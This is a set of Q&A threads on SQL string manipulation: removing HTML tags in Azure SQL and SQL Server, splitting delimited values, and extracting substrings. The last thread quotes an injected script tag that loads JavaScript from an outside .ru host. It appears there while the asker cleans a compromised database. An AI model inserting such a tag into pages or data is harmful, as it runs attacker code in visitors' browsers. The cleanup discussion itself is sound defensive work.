Replace multiple values between two characters in Azure SQL

In Azure SQL, I'm trying to delete all text that appears between the < and > characters in a column of my table.
Sample text:
The best part is that. < br >Note:< br >< u> reading
:< /u> < span style="font-family: calibri,sans-serif; font-size: 11pt;"> moral stories from an early age
< b>not only helps your child.< /b>< br>< u>in
learning important: < /u>< /span>< span style="font-family: calibri;
">life lessons but it also helps, in language development.< /span>< ./span>
Output:
The best part is that. reading: moral stories from an early age not only helps your child in learning important: life lessons but it also helps in language development.
I tried the query below, but it works only for short comment text:
SELECT [Comments],REPLACE([Comments], SUBSTRING([Comments], CHARINDEX('<', [Comments]), CHARINDEX('>', [Comments]) - CHARINDEX('<', [Comments]) + 1),'') AS result
FROM table

I created an input table named check_1 and inserted the sample data into it.
This query removes only the first occurrence of the pattern:
SELECT [Comments],REPLACE([Comments], SUBSTRING([Comments], CHARINDEX('<', [Comments]), CHARINDEX('>', [Comments]) - CHARINDEX('<', [Comments]) + 1),'') AS result
FROM check_1
To remove every substring in the text that begins with '<' and ends with '>', create a user-defined function with a WHILE loop:
CREATE FUNCTION [dbo].[udf_removetags] (@input_text VARCHAR(MAX)) RETURNS VARCHAR(MAX)
AS
BEGIN
DECLARE @pos_1 INT
DECLARE @pos_n INT
DECLARE @Length INT
SET @pos_1 = CHARINDEX('<',@input_text)
SET @pos_n = CHARINDEX('>',@input_text,CHARINDEX('<',@input_text))
SET @Length = (@pos_n - @pos_1) + 1
WHILE @pos_1 > 0 AND @pos_n > 0 AND @Length > 0
BEGIN
SET @input_text = replace(@input_text,substring(@input_text,@pos_1,@Length),'')
SET @pos_1 = CHARINDEX('<',@input_text)
SET @pos_n = CHARINDEX('>',@input_text,CHARINDEX('<',@input_text))
SET @Length = (@pos_n - @pos_1) + 1
END
RETURN @input_text
END
select [dbo].[udf_removetags](comments) as result from check_1
Output String:
The best part is that. Note: reading : moral stories from an early age not only helps your child.in learning important: life lessons but it also helps, in language development.
You can also use STUFF (see the Microsoft documentation on STUFF) in place of the REPLACE + SUBSTRING combination.
In the user-defined function, replace the line
SET @input_text = replace(@input_text,substring(@input_text,@pos_1,@Length),'')
with the line
SET @input_text = STUFF(@input_text,@pos_1,@Length,'')
The result is the same.
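To check the STUFF-based loop without creating a function first, the same logic can be run as a standalone batch against a literal. This is only a sketch: the variable names and the short sample string are made up for illustration.

```sql
-- Hypothetical sample value; spaces inside the tags mimic the question's data.
DECLARE @text VARCHAR(MAX) = 'a < br >b< u>c< /u>';
DECLARE @open INT = CHARINDEX('<', @text);
DECLARE @close INT = CHARINDEX('>', @text, @open);

-- Keep going while a '<' exists and a '>' follows it.
WHILE @open > 0 AND @close > @open
BEGIN
    -- Delete exactly the characters from '<' through '>' at this position.
    SET @text = STUFF(@text, @open, @close - @open + 1, '');
    SET @open = CHARINDEX('<', @text);
    SET @close = CHARINDEX('>', @text, @open);
END

SELECT @text AS result;  -- 'a bc'
```

Unlike REPLACE, STUFF touches only the span at the given position, so each pass removes one tag rather than every identical copy of it; the final string is the same either way.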

According to https://learn.microsoft.com/../azure/../regexp_replace Azure supports REGEXP_REPLACE.
This means it should be possible to replace all '<...>' by '' via
select regexp_replace(comments, '<[^>]*>', '') from mytable;

Related

Sparx EA Heatmap: Combine none or multiple results from a selects subquery into a single comma-separated value

I'm using Sparx EA 14.x with the file-based repository and will move to a SQL Server based repository soon. I'm currently creating a base template model to be used later with real customer data in the SQL Server based repository.
I have created Tagged Values (type=RefGUIDList), e.g. for relating my data elements to existing Bus.Processes. The existing business processes can be selected from a list, and their .ea_guid is stored as the value of the tagged value.
I have created a HeatMap chart with the SQL below attached.
The SQL works fine if the tagged value has only one business process selected; the problem is that if I add more processes, there are no results.
SELECT (SELECT t_object.Name FROM t_object
WHERE t_object.ea_guid = tv.Value) AS Series,
t_object.Alias AS GroupName, Packages.Name
FROM t_object,
t_package RootPackage,
t_package Packages,
t_objectproperties tv
WHERE RootPackage.Name = 'Data elements' AND
Packages.Parent_ID = RootPackage.Package_ID AND
t_object.Package_ID = Packages.Package_ID AND
t_object.Object_ID = tv.Object_ID AND
tv.Property = 'APM:Prosesses'
One solution I have been looking at would be to concatenate the names of the listed Bus.Processes and show the result.
I'm aware that the SQL Server dialect differs from that of the current Access-based repository.
The problem was that several ea_guid values were stored in a single t_objectproperties.Value, and I needed the corresponding t_object.Name values as a comma-separated list.
What worked in my case was to first move the repository to SQL Server and then create a function like the one below:
CREATE FUNCTION fnSplitString
(
@string NVARCHAR(1000),
@delimiter CHAR(1)
)
RETURNS VARCHAR(1000) AS
BEGIN
DECLARE @csvObjectname VARCHAR(1000)
DECLARE @start INT, @end INT
SELECT @start = 1, @end = CHARINDEX(@delimiter, @string)
WHILE @start < LEN(@string) + 1 BEGIN
IF @end = 0
SET @end = LEN(@string) + 1
SELECT @csvObjectname = COALESCE(@csvObjectname + ', ', '') +
COALESCE(t_Object.Name,'')
FROM t_Object
WHERE t_Object.ea_guid = SUBSTRING(@string, @start, @end - @start)
SET @start = @end + 1
SET @end = CHARINDEX(@delimiter, @string, @start)
END
RETURN @csvObjectname
END
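The answer does not show how the function is called from the chart query. A possible usage, assuming the function was created in the dbo schema and that the RefGUIDList value separates GUIDs with a comma (both are assumptions, not stated above), might look like this:

```sql
-- Sketch only: the ',' delimiter and the dbo schema are assumptions.
SELECT dbo.fnSplitString(tv.Value, ',') AS Series,   -- comma-separated process names
       o.Alias                          AS GroupName,
       p.Name
FROM t_object o
JOIN t_package p           ON o.Package_ID = p.Package_ID
JOIN t_package r           ON p.Parent_ID  = r.Package_ID
JOIN t_objectproperties tv ON o.Object_ID  = tv.Object_ID
WHERE r.Name = 'Data elements'
  AND tv.Property = 'APM:Prosesses';
```

This returns one row per data element with all of its process names in a single Series value, instead of relying on a scalar subquery that matches only when Value holds exactly one GUID.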

How to split a column by the number of white spaces in it with SQL?

I've got a single column that contains a set of names in it. I didn't design the database so that it contains multiple values in one column, but as it is I've got to extract that information now.
The problem is that in one field I've got multiple values like in this example:
"Jack Tom Larry Stan Kenny"
So the first three should be one group, and the other ones on the far right are another group. (Basically the only thing that separates them in the column is a specific number of whitespace between them, let's say 50 characters.)
How can I split them in pure SQL, so that I can get two columns like this:
column1 "Jack Tom Larry"
column2 "Stan Kenny"
A fairly simplistic answer would be to use a combination of left(), right() and locate(). Something like this (note I've substituted 50 spaces with "XXX" for readability):
declare global temporary table session.x(a varchar(100))
on commit preserve rows with norecovery;
insert into session.x values('Jack Tom LarryXXXStan Kenny');
select left(a,locate(a,'XXX')-1),right(a,length(a)+1-(locate(a,'XXX')+length('XXX'))) from session.x;
If you need a more general method of extracting the nth field from a string with a given separator, a bit like the split_part() function in PostgreSQL, in Ingres your options would be:
Write a user defined function using the Object Management Extension (OME). This isn't entirely straightforward but there is an excellent example in the wiki pages of Actian's community site to get you started:
http://community.actian.com/wiki/OME:_User_Defined_Functions
Create a row-producing procedure. A bit more clunky to use than an OME function, but much easier to implement. Here's my attempt at such a procedure, not terribly well tested but it should serve as an example. You may need to adjust the widths of the input and output strings:
create procedure split
(
inval = varchar(200) not null,
sep = varchar(50) not null,
n = integer not null
)
result row r(x varchar(200)) =
declare tno = integer not null;
srch = integer not null;
ptr = integer not null;
resval = varchar(50);
begin
tno = 1;
srch = 1;
ptr = 1;
while (:srch <= length(:inval))
do
while (substr(:inval, :srch, length(:sep)) != :sep
and :srch <= length(:inval))
do
srch = :srch + 1;
endwhile;
if (:tno = :n)
then
resval=substr(:inval, :ptr, :srch - :ptr);
return row(:resval);
return;
endif;
srch = :srch + length(:sep);
ptr = :srch;
tno = :tno + 1;
endwhile;
return row('');
end;
select s.x from session.x t, split(t.a,'XXX',2) s;

Substring from right by character SQL

I have a string(s)-
CO_CS_SV_Integrate_WP_BalancingCostRiskandComplexityinYourDRStrat_Apr-Jun
Or
CO_CS_SV_CommVaultTapSponsorship_WP_GartnerNewsletterSmartIdeaforBigData_Jan-Mar
Or
CO_CS_IA_eMedia_WP_Top5eDiscoveryChallengesSolved_Apr-Jun
I need to get the asset name associated with the campaign which is in the campaign name.
So for example "Balancing Cost Risk and Complexity in Your DR Strat"
would be the asset associated with the first campaign-
"CO_CS_SV_Integrate_WP_BalancingCostRiskandComplexityinYourDRStrat_Apr-Jun"
That is my goal. I want to get just that from the string ("Balancing Cost Risk and Complexity in Your DR Strat").
But I don't see how to strip out the asset from the campaign name. Its position is not consistent, and neither is anything else about it.
I think I can go from the right and find the second "_".
But I don't know the syntax. I get as far as -
select campaign.name
,Right (campaign.name, charindex('_', REVERSE(campaign.name))) as Test
from campaign
which gives me -
_Apr-Jun
Any help or direction would be greatly appreciated
Thanks.
You could create a scalar function that accepts the string, like the following:
CREATE FUNCTION myFunction
(
@str varchar(300)
)
RETURNS varchar(300)
AS
BEGIN
declare @reverse varchar(200),@idx1 int,@idx2 int
set @reverse = reverse(@str)
set @idx1 = CHARINDEX('_',@reverse)
set @idx2 = CHARINDEX('_',@reverse,@idx1+1)
return reverse(substring(@reverse,@idx1+1,@idx2-@idx1-1))
END
You can try with the following example:
select dbo.myFunction('CO_CS_SV_Integrate_WP_BalancingCostRiskandComplexityinYourDRStrat_Apr-Jun');
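If creating a function is not an option, the same reverse-and-search idea can be written inline. The following is a sketch that uses CROSS APPLY to name the intermediate values; the derived table of sample names stands in for the campaign table, and the aliases are made up for illustration.

```sql
SELECT c.name,
       -- Text between the last two underscores, flipped back to normal order.
       REVERSE(SUBSTRING(r.rev, i1.pos + 1, i2.pos - i1.pos - 1)) AS asset
FROM (VALUES
        ('CO_CS_SV_Integrate_WP_BalancingCostRiskandComplexityinYourDRStrat_Apr-Jun'),
        ('CO_CS_SV_CommVaultTapSponsorship_WP_GartnerNewsletterSmartIdeaforBigData_Jan-Mar'),
        ('CO_CS_IA_eMedia_WP_Top5eDiscoveryChallengesSolved_Apr-Jun')
     ) AS c(name)
CROSS APPLY (SELECT REVERSE(c.name) AS rev) AS r
CROSS APPLY (SELECT CHARINDEX('_', r.rev) AS pos) AS i1              -- last '_' in the original
CROSS APPLY (SELECT CHARINDEX('_', r.rev, i1.pos + 1) AS pos) AS i2; -- second-to-last '_'
```

Like the function, this returns the asset exactly as stored (for example BalancingCostRiskandComplexityinYourDRStrat); it does not insert spaces between the words.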

how to strip all html tags and special characters from string using sql server

I work as asp.net developer using C#, I receive text like this from the client:
> <p><a
> href="http://www.vogue.co.uk/person/kate-winslet">KATE
> WINSLET</a>&nbsp;has given birth to a 9lb baby boy. The
> Oscar-winning actress welcomed the baby with her husband Ned Rocknroll
> at a hospital in Sussex.</p>
>
> <p>&quot;Kate had &#39;Baby Boy Winslet&#39; on
> Saturday at an NHS Hospital,&quot; Winslet&#39;s spokeswoman
> said, adding that the family were &quot;thrilled to
> bits&quot;.</p>
>
> <p>The announcement suggests that the child might bear his
> mother&#39;s surname, rather than his father&#39;s slightly
> more unusual moniker.</p>
>
> <p>The baby is Winslet&#39;s third - she is already mother
> to Mia, 13, and Joe, eight, &nbsp;from previous relationships -
> and her husband&#39;s first. They met on Necker Island, owned by
> Rocknroll&#39;s uncle, Richard Branson, and<a
> href="http://www.vogue.co.uk/news/2013/kate-winslet-married-to-ned-rocknroller---wedding-details">married almost a year ago</a>&nbsp;in New York.</p>
I need a way to extract the plain text, without tags and special characters, using SQL Server 2008 or later.
The best I can suggest is to use a .net HTML parser or such which is wrapped in a SQL CLR function. Or to wrap the regex in SQL CLR if you want.
Note regex limitations: http://www.codinghorror.com/blog/2008/06/regular-expressions-now-you-have-two-problems.html
Raw SQL language won't do it: it is not a string (or HTML) processing language
I recently had the same requirement (to remove HTML tags and entities), so I developed this function in SQL Server.
CREATE FUNCTION CTU_FN_StripHTML (@dirtyText NVARCHAR(MAX))
RETURNS NVARCHAR(MAX)
AS
BEGIN
-- Cleaned Text
DECLARE @cleanText NVARCHAR(MAX)=RTRIM(LTRIM(@dirtyText));
-- HTML Tags
DECLARE @tagStart SMALLINT =PATINDEX('%<%>%', @cleanText);
DECLARE @tagEnd SMALLINT;
DECLARE @tagLength SMALLINT;
-- HTML Entities
DECLARE @entityStart SMALLINT =PATINDEX('%&%;%', @cleanText);
DECLARE @entityEnd SMALLINT;
DECLARE @entityLength SMALLINT;
WHILE @tagStart > 0
OR
@entityStart > 0
BEGIN
-- Remove HTML Tag
SET @tagStart=PATINDEX('%<%>%', @cleanText);
IF @tagStart > 0
BEGIN
SET @tagEnd=CHARINDEX('>', @cleanText, @tagStart);
SET @tagLength=(@tagEnd - @tagStart) + 1;
SET @cleanText=STUFF(@cleanText, @tagStart, @tagLength, '');
END;
-- Remove HTML Entity
SET @entityStart=PATINDEX('%&%;%', @cleanText);
IF @entityStart > 0
BEGIN
SET @entityEnd=CHARINDEX(';', @cleanText, @entityStart);
SET @entityLength=(@entityEnd - @entityStart) + 1;
SET @cleanText=STUFF(@cleanText, @entityStart, @entityLength, '');
END;
END;
SET @cleanText = RTRIM(LTRIM(@cleanText))
RETURN @cleanText;
END;
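A short usage sketch, assuming the function was created in the dbo schema. The two literals are shortened fragments in the style of the question's text. Note that the function deletes entities rather than decoding them, so a non-breaking space between words disappears entirely.

```sql
-- Entities such as &quot; and &#39; are removed, not translated to characters.
SELECT dbo.CTU_FN_StripHTML(N'<p>&quot;Kate had &#39;Baby Boy Winslet&#39;</p>') AS cleaned;
-- Kate had Baby Boy Winslet

-- An &nbsp; that separates two words is deleted, which joins them.
SELECT dbo.CTU_FN_StripHTML(N'<a href="x">KATE WINSLET</a>&nbsp;has given birth') AS cleaned;
-- KATE WINSLEThas given birth

-- One possible workaround: turn &nbsp; into a plain space before stripping.
SELECT dbo.CTU_FN_StripHTML(
           REPLACE(N'<a href="x">KATE WINSLET</a>&nbsp;has given birth', N'&nbsp;', N' ')
       ) AS cleaned;
```

The same pre-replacement approach could be used for any other entity that should survive as a real character; anything not handled that way is simply dropped.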
HTML is so complex it's a very bad idea to do this without an HTML Parser.
You might be interested in This Question.
The answer that's accepted there is to just use Lynx via the command line and dump the output to a file.
If you can do it outside the users page-load it might be the best option.

Not able to remove injected script from database rows

I've been handed a MS SQL 2000 database which has been injected with malware.
The malware script is as follows:
<script src=http://www.someAddress.ru/aScript.js></script>
Now I want to remove this piece of code from the table rows.
As a test, I inserted <h1> Test </h1> into a row and successfully ran the following query:
UPDATE myTable
SET description = REPLACE (description, '<h1>','')
WHERE id = 2;
This removed the h1 tag.
But trying the same with the script tag does not work:
UPDATE myTable
set description = REPLACE (description, '<script src=http://www.someAddress.ru/aScript.js></script>','')
WHERE id = 2
Why does this not work?
UPDATE 2
WOHO! I found the solution!
I'm using the following code, which I found here: http://www.tek-tips.com/viewthread.cfm?qid=1563568&page=3
-- Look for open and close HTML tags making sure a letter or / follows < ensuring its an opening
-- HTML tag or closing HTML tag and not an unencoded < symbol
CREATE FUNCTION [dbo].[udf_StripHTML]
(@HTMLText VARCHAR(8000))
RETURNS VARCHAR(8000)
AS
BEGIN
DECLARE @Start INT
DECLARE @End INT
DECLARE @Length INT
SET @Start = CHARINDEX('<',@HTMLText)
SET @End = CHARINDEX('>',@HTMLText,CHARINDEX('<',@HTMLText))
SET @Length = (@End - @Start) + 1
WHILE @Start > 0
AND @End > 0
AND @Length > 0
BEGIN
SET @HTMLText = STUFF(@HTMLText,@Start,@Length,'')
SET @Start = CHARINDEX('<',@HTMLText)
SET @End = CHARINDEX('>',@HTMLText,CHARINDEX('<',@HTMLText))
SET @Length = (@End - @Start) + 1
END
RETURN Replace(LTRIM(RTRIM(@HTMLText)),' ',' ')
END
GO
To remove the HTML tags / scripts, I run the following query:
UPDATE mytable
SET description = [dbo].[udf_StripHTML](description)
-- WHERE id = 35;
This works perfectly. Note that this function removes ALL HTML. So if I only want to remove <script>, I just replace '<' with '<script'.
Have you tried looking for just aScript.js? The entry could be URL-encoded, or something similar, which would give something like
%3Cscript+src%3Dhttp%3A%2F%2Fwww.someAddress.ru%2FaScript.js%3E%3C%2Fscript%3E
Reread Question
Do you mean that even when you have the script tag in a column with id=2 it doesn't work? Because if it's not working, are you sure that it exists in the row with id=2? :p
Should work, unless there are other hidden characters in there you can't see, or there is some form of encoding going on. Can you SELECT a suspect row to look at more closely.
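A query along these lines can be used to look at a suspect row more closely. It is a sketch that reuses the table and column names from the question; the output column aliases are made up.

```sql
-- Find rows that mention the injected host and show what surrounds the tag.
SELECT id,
       LEN(description)                  AS char_count,
       CHARINDEX('<script', description) AS script_pos,   -- 0 means no literal '<script'
       SUBSTRING(description,
                 CHARINDEX('<script', description),
                 100)                    AS fragment
FROM myTable
WHERE description LIKE '%someAddress.ru%';
```

If the row with id = 2 does not come back, or script_pos is 0, the stored text differs from the literal passed to REPLACE (for example through encoding, quotes around the src value, or line breaks), which would explain why the exact-match REPLACE changes nothing.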
I would tend to completely DELETE FROM myTable WHERE description LIKE '%someAddress.ru%' where possible.
However, fixing the database isn't a real solution; the application must be fixed. It shouldn't ever be echoing text out of the database unencoded. If someone enters some data including the string <script> it should simply appear on the page as the literal string <script>, or in the source as &lt;script&gt;.
Wouldn't the src attribute value be surrounded by quotes? If so, you would have to escape them to get a proper match on the replace.
Why not try:
UPDATE myTable
set description = REPLACE (description, 'www.someAddress.ru','localhost')
WHERE id = 2
That would eliminate the immediate hijacking problem, and would likely avoid line break / funky characters problems.
You could try the following to strip the code out of your field (I'm assuming you have information in the same field that you want to keep):
update myTable
set description = case when PATINDEX('%<script%', notes) > 0
then SUBSTRING(notes, 1, PATINDEX('%<script%', notes)-1) + SUBSTRING(notes, PATINDEX('%script>%', notes) + 7, LEN(notes))
else notes
end
where id=2
You could first run a select to see if the value returned by the CASE statement is correct before running the update. It should not affect fields without a script tag in them, though.
Hold on...
Is the database related to a financial system? Is the application under Sarbanes-Oxley? Has any fraud been committed?
Any of those things preclude you from making changes that would, "destroy evidence." Those little guys running around with "FBI" on their jackets don't take kindly to that. It would be a good thing to back it up now, and the logs (SQL and Web), and put that backup on a few DVDs. It would be better to remove the disk and put in another one (but that may not be an option).
Moving on to cleansing:
bobince's direction is the correct one. Don't look for the whole SCRIPT tag, or try to find variations. Instead, look for something in the script tag that isn't part of the normal dataset. That's what you key off. If it SELECTs okay, then turn it into a DELETE and save that query, because you will need it while you turn to fixing the application (guaranteed your database will get corrupted again).
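The SELECT-then-DELETE step could be sketched as follows, using the host name from the question as the marker that is not part of the normal data. Wrapping the DELETE in a transaction is an addition for safety, not something the answers above prescribe.

```sql
-- Step 1: review exactly which rows the predicate matches.
SELECT id, description
FROM myTable
WHERE description LIKE '%someAddress.ru%';

-- Step 2: reuse the identical predicate for the DELETE.
BEGIN TRANSACTION;

DELETE FROM myTable
WHERE description LIKE '%someAddress.ru%';

-- Compare this count with the number of rows returned in step 1.
SELECT @@ROWCOUNT AS rows_deleted;

-- Then run COMMIT TRANSACTION if the counts agree, or ROLLBACK TRANSACTION if not.
```

Take the backups mentioned above before running anything like this, and keep the query, since it will be needed again until the application itself is fixed.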